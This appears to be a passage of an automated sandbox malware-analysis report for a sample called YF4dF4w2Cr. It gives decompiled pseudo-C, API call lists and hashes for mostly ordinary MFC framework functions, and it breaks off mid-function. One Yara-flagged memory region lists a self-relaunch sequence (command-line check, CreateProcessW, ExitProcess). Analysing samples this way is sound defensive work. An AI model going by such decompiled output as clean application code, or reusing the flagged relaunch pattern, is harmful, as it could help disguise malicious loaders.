                  • Instruction ID: c70a73cfab10beb5ae40e0ca9f9cf222f8cc2b62db800e03fd6d50582627701f
                  • Opcode Fuzzy Hash: b9b20a255bf8ec8179fb1d58bd2a46d1a8caece91da757cd9b7519637d2d4eb4
                  • Instruction Fuzzy Hash: F2F067B1E40724BAE7105F72AC4AB1A7F68FB41721F014826E6158B280EBB598108FD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E00411F96(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                  				intOrPtr _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char* _v20;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v40;
                  				intOrPtr _v52;
                  				signed int _v56;
                  				void* __ebp;
                  				intOrPtr _t127;
                  				void* _t133;
                  				intOrPtr _t135;
                  				signed int _t145;
                  				signed int _t150;
                  				signed int _t167;
                  				signed int _t183;
                  				signed int _t185;
                  				signed int _t187;
                  				signed int _t189;
                  				signed int _t191;
                  				signed int _t195;
                  				void* _t198;
                  				intOrPtr _t199;
                  				signed int _t209;
                  
                  				_t198 = __ecx;
                  				_t127 = E0041F363(__ebx, __edi, __esi, __eflags);
                  				_v8 = _t127;
                  				_t3 =  &_a4;
                  				 *_t3 = _a4 &  !( *(_t127 + 0x18));
                  				if( *_t3 == 0) {
                  					return 1;
                  				}
                  				_push(__ebx);
                  				_push(__esi);
                  				_push(__edi);
                  				_t209 = 0;
                  				E00431160(0,  &_v56, 0, 0x28);
                  				_v52 = DefWindowProcA;
                  				_t133 = E0041F363(__ebx, 0, 0, __eflags);
                  				__eflags = _a4 & 0x00000001;
                  				_v40 =  *((intOrPtr*)(_t133 + 8));
                  				_t135 =  *0x466550; // 0x10003
                  				_t195 = 8;
                  				_v32 = _t135;
                  				_v16 = _t195;
                  				if(__eflags != 0) {
                  					_push( &_v56);
                  					_v56 = 0xb;
                  					_v20 = "AfxWnd90s";
                  					_t191 = E00411C95(_t195, _t198, 0, 0, __eflags);
                  					__eflags = _t191;
                  					if(_t191 != 0) {
                  						_t209 = 1;
                  						__eflags = 1;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000020;
                  				if(__eflags != 0) {
                  					_v56 = _v56 | 0x0000008b;
                  					_push( &_v56);
                  					_v20 = "AfxOleControl90s";
                  					_t189 = E00411C95(_t195, _t198, 0, _t209, __eflags);
                  					__eflags = _t189;
                  					if(_t189 != 0) {
                  						_t209 = _t209 | 0x00000020;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000002;
                  				if(__eflags != 0) {
                  					_push( &_v56);
                  					_v56 = 0;
                  					_v20 = "AfxControlBar90s";
                  					_v28 = 0x10;
                  					_t187 = E00411C95(_t195, _t198, 0, _t209, __eflags);
                  					__eflags = _t187;
                  					if(_t187 != 0) {
                  						_t209 = _t209 | 0x00000002;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000004;
                  				if(__eflags != 0) {
                  					_v56 = _t195;
                  					_v28 = 0;
                  					_t185 = E00411F52(_t198, __eflags,  &_v56, "AfxMDIFrame90s", 0x7a01);
                  					__eflags = _t185;
                  					if(_t185 != 0) {
                  						_t209 = _t209 | 0x00000004;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & _t195;
                  				if(__eflags != 0) {
                  					_v56 = 0xb;
                  					_v28 = 6;
                  					_t183 = E00411F52(_t198, __eflags,  &_v56, "AfxFrameOrView90s", 0x7a02);
                  					__eflags = _t183;
                  					if(_t183 != 0) {
                  						_t209 = _t209 | _t195;
                  						__eflags = _t209;
                  					}
                  				}
                  				__eflags = _a4 & 0x00000010;
                  				if(__eflags != 0) {
                  					_v12 = 0xff;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x3fc0);
                  					_t48 =  &_a4;
                  					 *_t48 = _a4 & 0xffffc03f;
                  					__eflags =  *_t48;
                  				}
                  				__eflags = _a4 & 0x00000040;
                  				if(__eflags != 0) {
                  					_v12 = 0x10;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x40);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000080;
                  				if(__eflags != 0) {
                  					_v12 = 2;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x80);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000100;
                  				if(__eflags != 0) {
                  					_v12 = _t195;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x100);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000200;
                  				if(__eflags != 0) {
                  					_v12 = 0x20;
                  					_t209 = _t209 | E0040F52E(_t195, _t198, _t209, __eflags,  &_v16, 0x200);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000400;
                  				if(__eflags != 0) {
                  					_v12 = 1;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x400);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00000800;
                  				if(__eflags != 0) {
                  					_v12 = 0x40;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x800);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00001000;
                  				if(__eflags != 0) {
                  					_v12 = 4;
                  					_t167 = E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x1000); // executed
                  					_t209 = _t209 | _t167;
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00002000;
                  				if(__eflags != 0) {
                  					_v12 = 0x80;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x2000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00004000;
                  				if(__eflags != 0) {
                  					_v12 = 0x800;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x4000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00008000;
                  				if(__eflags != 0) {
                  					_v12 = 0x400;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x8000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00010000;
                  				if(__eflags != 0) {
                  					_v12 = 0x200;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x10000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00020000;
                  				if(__eflags != 0) {
                  					_v12 = 0x100;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x20000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00040000;
                  				if(__eflags != 0) {
                  					_v12 = 0x8000;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x40000);
                  					__eflags = _t209;
                  				}
                  				__eflags = _a4 & 0x00080000;
                  				if(__eflags != 0) {
                  					_v12 = 0x1000;
                  					_t209 = _t209 | E0040F52E(0x400, _t198, _t209, __eflags,  &_v16, 0x80000);
                  					__eflags = _t209;
                  				}
                  				_t199 = _v8;
                  				 *(_t199 + 0x18) =  *(_t199 + 0x18) | _t209;
                  				_t145 =  *(_t199 + 0x18);
                  				__eflags = (_t145 & 0x00003fc0) - 0x3fc0;
                  				if((_t145 & 0x00003fc0) == 0x3fc0) {
                  					 *(_t199 + 0x18) = _t145 | 0x00000010;
                  					_t209 = _t209 | 0x00000010;
                  					__eflags = _t209;
                  				}
                  				asm("sbb eax, eax");
                  				_t150 =  ~((_t209 & _a4) - _a4) + 1;
                  				__eflags = _t150;
                  				return _t150;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memset
                  • String ID: @$@$AfxControlBar90s$AfxFrameOrView90s$AfxMDIFrame90s
                  • API String ID: 2102423945-1210016405
                  • Opcode ID: 48f1f3766a55285f2edbc49f154cf69d3c1f460646b03b50caf20c9a1f8d3e0c
                  • Instruction ID: a80ea7a57d0ef6c1a4e0f94e743f0cf838566c70e38dc4dc6695c3c797ddb862
                  • Opcode Fuzzy Hash: 48f1f3766a55285f2edbc49f154cf69d3c1f460646b03b50caf20c9a1f8d3e0c
                  • Instruction Fuzzy Hash: 2091F175D00209BBDB50DFD4C586BDFBFE8AB48344F14817AFA08E6181E7B88A95C794
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 63%
                  			E00406EBD(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                  				signed int _v8;
                  				char _v17;
                  				char _v18;
                  				signed int _v19;
                  				char _v28;
                  				long _v32;
                  				signed int _v36;
                  				char _v52;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t43;
                  				signed int _t50;
                  				signed char _t57;
                  				void* _t68;
                  				void* _t86;
                  				intOrPtr* _t87;
                  				intOrPtr* _t88;
                  				signed int _t89;
                  
                  				_t86 = __edx;
                  				_t43 =  *0x463404; // 0x38a11573
                  				_v8 = _t43 ^ _t89;
                  				_t87 = _a8;
                  				_t88 = __ecx;
                  				_push( &_v28);
                  				_push(_a4);
                  				_push(0x417);
                  				 *((intOrPtr*)( *__ecx + 0x118))();
                  				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
                  				_v18 = 0;
                  				_v17 = 0;
                  				 *((char*)(_t87 + 0xa)) = 0;
                  				 *((char*)(_t87 + 0xb)) = 0;
                  				if(E00431DB1(_t87,  &_v28, 0x14) != 0) {
                  					_t50 = E00412B38(_t88);
                  					_t69 = _t50;
                  					_v36 = _t50;
                  					E00412B6C(_t88, 0x10000000, 0, 0); // executed
                  					 *((intOrPtr*)( *_t88 + 0x118))(0x416, _a4, 0, _t68);
                  					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
                  						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
                  						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
                  						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
                  						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
                  						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
                  						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
                  						_t69 = _v36;
                  					}
                  					 *((intOrPtr*)( *_t88 + 0x118))(_a4, _t87);
                  					E00412B6C(_t88, 0, _t69 & 0x10000000, 0); // executed
                  					_t57 =  *((intOrPtr*)(_t87 + 9));
                  					_t68 = 0x415;
                  					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
                  						_push(1);
                  						_push(0);
                  						goto L9;
                  					} else {
                  						_push( &_v52);
                  						_push(_a4);
                  						_push(0x41d);
                  						if( *((intOrPtr*)( *_t88 + 0x118))() != 0) {
                  							_push(1);
                  							_push( &_v52);
                  							L9:
                  							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
                  						}
                  					}
                  				}
                  				return E00430650(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
                  			}

                  APIs
                  • _memcmp.LIBCMT ref: 00406F07
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • SendMessageA.USER32(?,0000043D,00000000,00000000), ref: 00406F60
                  • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00406F6E
                  • SendMessageA.USER32(?,0000043C,?,00000000), ref: 00406F7F
                  • SendMessageA.USER32(?,0000043C,?,00000000), ref: 00406F8E
                  • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00406F99
                  • InvalidateRect.USER32(?,00000000,00000001,00000000,00000000), ref: 0040700C
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSend$InvalidateLongRectWindow_memcmp
                  • String ID:
                  • API String ID: 235743446-0
                  • Opcode ID: b4ca3858cf842c725fa609f0672fd941354109755bb967841d1566607b793c20
                  • Instruction ID: 911494d41f6155cba064028fc0f85afa7879889cb5e7fc441d97dfeff554b02b
                  • Opcode Fuzzy Hash: b4ca3858cf842c725fa609f0672fd941354109755bb967841d1566607b793c20
                  • Instruction Fuzzy Hash: CE417E30740208BBEB219F65CC56FEEBBB4FF08B14F104529F6556A2D1CBB4A950CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0231CDBC
                  • GetCommandLineW.KERNEL32 ref: 0231CDFA
                  • lstrlenW.KERNEL32(00000000), ref: 0231CE03
                  • lstrlenW.KERNEL32(?), ref: 0231CE12
                  • lstrcmpiW.KERNEL32(00000000,?), ref: 0231CE27
                  • ExitProcess.KERNEL32 ref: 0231CE38
                    • Part of subcall function 02311CC2: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02311CF2
                  • ExitProcess.KERNEL32 ref: 0231CE5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleNamelstrcmpi
                  • String ID:
                  • API String ID: 1899540587-0
                  • Opcode ID: 27e6d8f8bc057fafb3987002e0d22941d5156ec4a2b0fa388ffe3fc28f80171b
                  • Instruction ID: 6134659132cacbc68564661ef99b331a4e3629b898ca9f58c5c7eb12dc1d0383
                  • Opcode Fuzzy Hash: 27e6d8f8bc057fafb3987002e0d22941d5156ec4a2b0fa388ffe3fc28f80171b
                  • Instruction Fuzzy Hash: FE11D0B2980118ABDB38A7A4DC88EFF77BDEB54B45F010569E60993140EF305D5DCEA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 88%
                  			E00416A7E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t18;
                  				void* _t44;
                  				void* _t48;
                  
                  				_t42 = __edx;
                  				_t31 = __ebx;
                  				_push(8);
                  				_t18 = E00431A9B(E0044B456, __ebx, __edi, __esi);
                  				_t44 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x90)) == 0) {
                  					_t51 =  *((intOrPtr*)(__ecx + 0x92));
                  					if( *((intOrPtr*)(__ecx + 0x92)) == 0) {
                  						E004014C0(_t48 - 0x14, __edx);
                  						 *((intOrPtr*)(_t48 - 4)) = 0;
                  						E004292E7(__ebx, __edx,  *((intOrPtr*)(E0041F363(__ebx, _t44, 0, _t51) + 8)), _t48 - 0x14); // executed
                  						_push(PathFindFileNameA( *(_t48 - 0x14)));
                  						E00406039(_t31, _t48 - 0x10, _t42, _t44, 0, _t51);
                  						 *((char*)(_t48 - 4)) = 1;
                  						PathRemoveExtensionA(E0040A688(_t48 - 0x10));
                  						E0040A356(_t48 - 0x10, 0xffffffff);
                  						 *((short*)(_t44 + 0x90)) = GlobalAddAtomA( *(_t48 - 0x10));
                  						 *((short*)(_t44 + 0x92)) = GlobalAddAtomA("system");
                  						E004010B0( &(( *(_t48 - 0x10))[0xfffffffffffffff0]), _t42);
                  						_t18 = E004010B0( &(( *(_t48 - 0x14))[0xfffffffffffffff0]), _t42);
                  					}
                  				}
                  				return E00431B73(_t18);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00416A85
                    • Part of subcall function 004292E7: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00429312
                    • Part of subcall function 004292E7: GetShortPathNameA.KERNEL32(?,00000000,00000104), ref: 00429329
                  • PathFindFileNameA.SHLWAPI(?,00000008,004017F8), ref: 00416AC8
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • PathRemoveExtensionA.SHLWAPI(00000000,00000000), ref: 00416AE4
                  • GlobalAddAtomA.KERNEL32 ref: 00416AFD
                  • GlobalAddAtomA.KERNEL32 ref: 00416B0B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: NamePath$AtomFileGlobalH_prolog3$ExtensionFindModuleRemoveShort
                  • String ID: system
                  • API String ID: 403193770-3377271179
                  • Opcode ID: 715c8a44715037ab561ca445d125d12101abcb7d420da627e4c206c2fae4e1a1
                  • Instruction ID: 6af8255d80fce4e2872a3a295f9b7920885497d175e20f34bb1b1a59f62aa56d
                  • Opcode Fuzzy Hash: 715c8a44715037ab561ca445d125d12101abcb7d420da627e4c206c2fae4e1a1
                  • Instruction Fuzzy Hash: E1117031800126ABCF05EBB5CC46AAFB774BF00358F50422EB425272E2DB782944C7AE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 95%
                  			E0042FFA2(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16) {
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t11;
                  				void* _t14;
                  				intOrPtr _t17;
                  				void* _t18;
                  				struct HINSTANCE__* _t19;
                  				void* _t31;
                  				intOrPtr _t35;
                  				void* _t36;
                  				void* _t37;
                  
                  				_t37 = __eflags;
                  				_t32 = __edi;
                  				_t31 = __edx;
                  				_t25 = __ebx;
                  				_t11 = SetErrorMode(0); // executed
                  				SetErrorMode(_t11 | 0x00008001); // executed
                  				_t14 = E0041F363(__ebx, __edi, SetErrorMode, _t37);
                  				_t35 = _a4;
                  				 *((intOrPtr*)(_t14 + 8)) = _t35;
                  				 *((intOrPtr*)(_t14 + 0xc)) = _t35;
                  				E0041EB0A(__ebx, _t14, _t31); // executed
                  				_t17 =  *((intOrPtr*)(E0041F363(_t25, __edi, _t35, _t37) + 4));
                  				_t38 = _t17;
                  				if(_t17 != 0) {
                  					 *((intOrPtr*)(_t17 + 0x48)) = _a12;
                  					 *((intOrPtr*)(_t17 + 0x4c)) = _a16;
                  					 *((intOrPtr*)(_t17 + 0x44)) = _t35;
                  					E0042FE1C(_t17, _t31, _t38); // executed
                  				}
                  				_t18 = E0041F363(_t25, _t32, _t35, _t38);
                  				_t39 =  *((char*)(_t18 + 0x14));
                  				_pop(_t36);
                  				if( *((char*)(_t18 + 0x14)) == 0) {
                  					E004161F7(_t36, _t39);
                  				}
                  				_t19 = GetModuleHandleA("user32.dll");
                  				if(_t19 != 0) {
                  					 *0x46633c = GetProcAddress(_t19, "NotifyWinEvent");
                  				}
                  				return 1;
                  			}

                  APIs
                  • SetErrorMode.KERNELBASE(00000000), ref: 0042FFB0
                  • SetErrorMode.KERNELBASE(00000000), ref: 0042FFB8
                    • Part of subcall function 0041EB0A: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EB42
                    • Part of subcall function 0041EB0A: SetLastError.KERNEL32(0000006F), ref: 0041EB59
                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00430007
                  • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 00430017
                    • Part of subcall function 0042FE1C: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042FE59
                    • Part of subcall function 0042FE1C: PathFindExtensionA.KERNELBASE(?), ref: 0042FE73
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FEBB
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FEFA
                    • Part of subcall function 0042FE1C: __strdup.LIBCMT ref: 0042FF41
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ErrorModule__strdup$FileModeName$AddressExtensionFindHandleLastPathProc
                  • String ID: NotifyWinEvent$user32.dll
                  • API String ID: 621541537-597752486
                  • Opcode ID: c6a86a99ad862286b29c596775c83a7a365c59ac402591dd4d029d8a3d1260bd
                  • Instruction ID: c3559d0f6dcdbc91b9a4477413689282f5a49392fc776aba5323f530c7d64581
                  • Opcode Fuzzy Hash: c6a86a99ad862286b29c596775c83a7a365c59ac402591dd4d029d8a3d1260bd
                  • Instruction Fuzzy Hash: 9C015E74A102149BD714AF66A845A9A3AE8AB08724B05806BF845D7352DA78D8448B69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00417A77(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t60;
                  				signed int _t65;
                  				signed int _t68;
                  				struct HWND__* _t69;
                  				struct HWND__* _t70;
                  				signed int _t72;
                  				signed int _t102;
                  				void* _t113;
                  				signed int _t116;
                  				DLGTEMPLATE* _t117;
                  				struct HWND__* _t118;
                  				intOrPtr* _t120;
                  				void* _t121;
                  
                  				_t115 = __edi;
                  				_t113 = __edx;
                  				_t96 = __ecx;
                  				_push(0x3c);
                  				E00431ACE(E0044B598, __ebx, __edi, __esi);
                  				_t120 = __ecx;
                  				 *((intOrPtr*)(_t121 - 0x20)) = __ecx;
                  				_t125 =  *(_t121 + 0x10);
                  				if( *(_t121 + 0x10) == 0) {
                  					 *(_t121 + 0x10) =  *(E0041F363(0, __edi, __ecx, _t125) + 0xc);
                  				}
                  				_t116 =  *(E0041F363(0, _t115, _t120, _t125) + 0x3c);
                  				 *(_t121 - 0x28) = _t116;
                  				 *(_t121 - 0x14) = 0;
                  				 *(_t121 - 4) = 0;
                  				E00411F96(0, _t96, _t116, _t120, _t125, 0x10);
                  				E00411F96(0, _t96, _t116, _t120, _t125, 0x3c000);
                  				if(_t116 == 0) {
                  					_t117 =  *(_t121 + 8);
                  					L7:
                  					__eflags = _t117;
                  					if(_t117 == 0) {
                  						L4:
                  						_t60 = 0;
                  						L26:
                  						return E00431B73(_t60);
                  					}
                  					E004014C0(_t121 - 0x1c, _t113);
                  					 *(_t121 - 4) = 1;
                  					 *((intOrPtr*)(_t121 - 0x18)) = 0;
                  					_t65 = E0042A0D6(__eflags, _t117, _t121 - 0x1c, _t121 - 0x18);
                  					__eflags = _t65;
                  					__eflags = 0 | _t65 == 0x00000000;
                  					if(__eflags != 0) {
                  						_push(_t117);
                  						E0042A09A(0, _t121 - 0x38, _t117);
                  						 *(_t121 - 4) = 2;
                  						E00429FF6(_t121 - 0x38,  *((intOrPtr*)(_t121 - 0x18)));
                  						 *(_t121 - 0x14) = E00429D03(_t121 - 0x38);
                  						 *(_t121 - 4) = 1;
                  						E00429CF5(_t121 - 0x38);
                  						__eflags =  *(_t121 - 0x14);
                  						if(__eflags != 0) {
                  							_t117 = GlobalLock( *(_t121 - 0x14));
                  						}
                  					}
                  					 *(_t120 + 0x44) =  *(_t120 + 0x44) | 0xffffffff;
                  					 *(_t120 + 0x3c) =  *(_t120 + 0x3c) | 0x00000010;
                  					E00410F0D(__eflags, _t120);
                  					_t68 =  *(_t121 + 0xc);
                  					__eflags = _t68;
                  					if(_t68 != 0) {
                  						_t69 =  *(_t68 + 0x20);
                  					} else {
                  						_t69 = 0;
                  					}
                  					_t70 = CreateDialogIndirectParamA( *(_t121 + 0x10), _t117, _t69, E00417499, 0); // executed
                  					_t118 = _t70;
                  					E004010B0( *((intOrPtr*)(_t121 - 0x1c)) + 0xfffffff0, _t113);
                  					 *(_t121 - 4) =  *(_t121 - 4) | 0xffffffff;
                  					_t102 =  *(_t121 - 0x28);
                  					__eflags = _t102;
                  					if(__eflags != 0) {
                  						__eflags = _t118;
                  						if(__eflags != 0) {
                  							 *((intOrPtr*)( *_t102 + 0x18))(_t121 - 0x48);
                  							 *((intOrPtr*)( *_t120 + 0x134))(0);
                  						}
                  					}
                  					_t72 = E0040EEF5(__eflags);
                  					__eflags = _t72;
                  					if(_t72 == 0) {
                  						 *((intOrPtr*)( *_t120 + 0x11c))();
                  					}
                  					__eflags = _t118;
                  					if(_t118 != 0) {
                  						__eflags =  *(_t120 + 0x3c) & 0x00000010;
                  						if(( *(_t120 + 0x3c) & 0x00000010) == 0) {
                  							DestroyWindow(_t118);
                  							_t118 = 0;
                  							__eflags = 0;
                  						}
                  					}
                  					__eflags =  *(_t121 - 0x14);
                  					if( *(_t121 - 0x14) != 0) {
                  						GlobalUnlock( *(_t121 - 0x14));
                  						GlobalFree( *(_t121 - 0x14));
                  					}
                  					__eflags = _t118;
                  					_t54 = _t118 != 0;
                  					__eflags = _t54;
                  					_t60 = 0 | _t54;
                  					goto L26;
                  				}
                  				_push(_t121 - 0x48);
                  				if( *((intOrPtr*)( *_t120 + 0x134))() != 0) {
                  					_t117 =  *((intOrPtr*)( *_t116 + 0x14))(_t121 - 0x48,  *(_t121 + 8));
                  					goto L7;
                  				}
                  				goto L4;
                  			}

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 00417A7E
                  • GlobalLock.KERNEL32 ref: 00417B56
                  • CreateDialogIndirectParamA.USER32(?,?,?,Function_00017499,00000000), ref: 00417B85
                  • DestroyWindow.USER32(00000000), ref: 00417BFF
                  • GlobalUnlock.KERNEL32(?), ref: 00417C0F
                  • GlobalFree.KERNEL32 ref: 00417C18
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                  • String ID:
                  • API String ID: 3003189058-0
                  • Opcode ID: 26ae8e959123f86c784b667f59ab4b8ba21f1b10ffa1528ca1f931d7bb6d0aa9
                  • Instruction ID: 0f3f62645ed42ea5829c959189857bbee3ade0c5a9f02b3c178cd9c28f783011
                  • Opcode Fuzzy Hash: 26ae8e959123f86c784b667f59ab4b8ba21f1b10ffa1528ca1f931d7bb6d0aa9
                  • Instruction Fuzzy Hash: 0C51B331A04209DFCF10EFA5C9859EEBBB1BF08318F14442EF502E7291DB789A81CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 62%
                  			E00414166(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, RECT* _a8) {
                  				signed int _v8;
                  				char _v268;
                  				RECT* _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				char _v292;
                  				intOrPtr _v296;
                  				signed int _v300;
                  				struct tagRECT _v316;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t71;
                  				signed char _t79;
                  				signed int _t84;
                  				signed int _t89;
                  				signed int _t91;
                  				signed int _t99;
                  				signed int _t114;
                  				intOrPtr _t128;
                  				intOrPtr _t129;
                  				intOrPtr _t136;
                  				intOrPtr _t151;
                  				signed int _t153;
                  				intOrPtr _t154;
                  				intOrPtr _t157;
                  				intOrPtr _t158;
                  				signed int _t163;
                  
                  				_t151 = __edx;
                  				_t130 = __ecx;
                  				_t161 = _t163;
                  				_t71 =  *0x463404; // 0x38a11573
                  				_v8 = _t71 ^ _t163;
                  				_t157 = _a4;
                  				_t128 = __ecx;
                  				_t153 = 0;
